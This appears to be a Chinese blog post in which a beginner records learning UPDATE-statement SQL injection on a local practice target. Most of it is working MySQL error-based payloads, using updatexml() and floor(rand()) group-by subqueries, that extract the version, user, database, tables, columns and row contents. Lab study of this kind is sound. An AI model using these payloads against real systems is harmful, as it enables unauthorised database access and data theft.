果然还是太菜....


起因

我就想安安静静找个XSS,结果碰到个update注入,以前没碰见过。

彩笔需要学习一波


在GitHub找了一个靶机本地测试,学习一波update注入
1.png
2.png

使用updataxml
查看版本:

'or updatexml(0,(select concat(0x7e,version())),0)='0

3.png

查看当前用户:

'or updatexml(0,(select concat(0x7e,user())),0)='0

4.png
查看数据库名:

'or updatexml(0,(select concat(0x7e,database())),0)='0

5.png

使用SQL子查询:

数据库名:

'or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables 
limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or'--+

5.png
用户:

'or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) FROM information_schema.tables limit 
0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or'--+

6.png

表名:

'or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(table_name as char),0x27,0x7e)) FROM information_schema.tables where 
table_schema='injection'limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or'--+

7.png
字段名:

'or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(column_name as char),0x27,0x7e)) FROM information_schema.columns where   
table_schema='injection' and table_name='student' limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or'--+

8.png

9.png
字段内容:

'or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(name as char),0x27,0x7e)) FROM student limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or'--+

10.png


简单的记录下,果然还是彩笔。

updata注入的方式有:

  • extractvalue()
  • name_const()

记了下笔记,溜了溜了...

参考文章:
https://drops.secquan.org/tips/2078
https://blog.csdn.net/Fly_hps/article/details/79416842

靶机地址:
https://github.com/admintony/insert_update_injectionCode


关注推送最新文章

本文由Qinto创作,除注明转载/出处外,均为本站原创,转载前请务必署名